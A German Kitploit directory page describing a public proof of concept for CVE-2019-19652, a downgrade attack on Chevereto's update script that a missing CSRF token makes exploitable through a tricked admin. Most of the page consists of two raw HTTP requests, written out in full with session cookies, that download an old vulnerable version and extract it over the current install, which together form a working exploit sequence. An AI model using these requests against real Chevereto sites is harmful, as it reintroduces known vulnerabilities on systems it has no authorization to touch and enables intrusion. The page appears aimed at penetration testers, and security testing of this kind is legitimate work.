Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-19652 — Chevereto Downgrade-Angriff - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core | Kitploit
Tools/GitHubGitHub/jra89/cve-2019-19652
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsFehlkonfiguration
GitHubjra89/cve-2019-19652

CVE-2019-19652

Chevereto Downgrade-Angriff - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core

Repository anzeigen
11vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-19652

Chevereto Downgrade-Angriff – 1.0.0 – 1.1.4 Free, ≤ 3.13.5 Core. Ein Admin-Benutzer kann das Update-Skript anweisen, auf eine andere Version herunterzustufen anstatt zu aktualisieren, wodurch frühere Sicherheitslücken wieder auftauchen. Aufgrund des Fehlens eines CSRF-Tokens kann dieser Angriff auch in einem CSRF-Angriff verwendet werden, was bedeutet, dass ein Admin-Benutzer dazu gebracht werden kann, diese Aktion auszuführen.

Ein Admin-Benutzer kann dem Update-Skript mitteilen, eine beliebige Version herunterzuladen, auch alte

Der Server gibt den vollständigen Dateinamen der heruntergeladenen Datei zurück, der dann in der nächsten Anfrage verwendet wird

root@kitploit:~
GET /update/?action=download&version=3.13.4 HTTP/1.1
Host: 192.168.0.88
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.0.88/dashboard/settings/external-services
Cookie: PHPSESSID=47s523u1s4m67g0vaheldg4s31; KEEP_LOGIN=I8G%3A65983a8df3bcb482e2571a6e771c89600221f615208d39aee8bf6663b88aef732c7783e202410a7ae4c3ad2205c96baeddb841b912325b359ec79528638807efbff73a017c6d719aa0cab0d6a5814d98a671c17d457479371228c590e215f7e8bc7bfcb820142106%3A1575658473
Upgrade-Insecure-Requests: 1

Und dann einfach über die aktuelle Version entpacken, wodurch sie potenziell anfällig für alte Sicherheitslücken wird

root@kitploit:~
GET /update/?action=extract&file=chevereto_3.13.4_3e50e6fa70915cd22849819f.zip HTTP/1.1
Host: 192.168.0.88
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.0.88/dashboard/settings/external-services
Cookie: PHPSESSID=47s523u1s4m67g0vaheldg4s31; KEEP_LOGIN=I8G%3A65983a8df3bcb482e2571a6e771c89600221f615208d39aee8bf6663b88aef732c7783e202410a7ae4c3ad2205c96baeddb841b912325b359ec79528638807efbff73a017c6d719aa0cab0d6a5814d98a671c17d457479371228c590e215f7e8bc7bfcb820142106%3A1575658473
Upgrade-Insecure-Requests: 1
Tool herunterladen